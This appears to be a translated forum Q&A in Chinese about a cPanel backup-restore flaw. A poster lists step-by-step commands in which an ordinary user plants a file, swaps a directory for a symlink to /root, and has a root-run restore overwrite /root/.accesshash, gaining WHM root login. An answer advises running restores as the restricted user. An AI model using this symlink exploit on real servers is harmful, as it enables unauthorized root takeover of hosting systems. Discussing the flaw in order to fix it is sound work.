我目前正在研究 cPanel 备份解决方案。我们现在已获悉此漏洞。
利用:对服务器的完全 ROOT 访问
1.) 从普通用户帐户创建恶意文件:
mkdir root
echo "hello" > root/.accesshash
2.) 等待备份运行
3.) 用符号链接(symbolic link)替换根:
ln -s /root root
4.) 恢复 root/.accesshash(为此我以 root 身份运行此命令:“cp -rf/backup/.accesshash/home/username/root/”)
5.) 用户现在拥有 root 访问权限,因为我们覆盖了/root/.accesshash。通过将访问哈希放入此文件,攻击者将能够以 root 身份登录 WHM。
root@cpanel [/home/master]# cat /root/.accesshash
hello
root@cpanel [/home/master]# ls -l /root/.accesshash
-rw-r--r-- 1 master master 3 Nov 20 21:41 /root/.accesshash
root@cpanel [/home/master]#
有人可以建议我解决这个问题吗?提前致谢。
请您参考如下方法:
这里的关键问题是作为 root 运行恢复命令。当为特定的受限用户(可能有恶意)执行此操作时,您必须以该用户身份运行它(或者可能以更受限的用户身份运行,在沙箱中恢复文件并稍后将其复制回来).
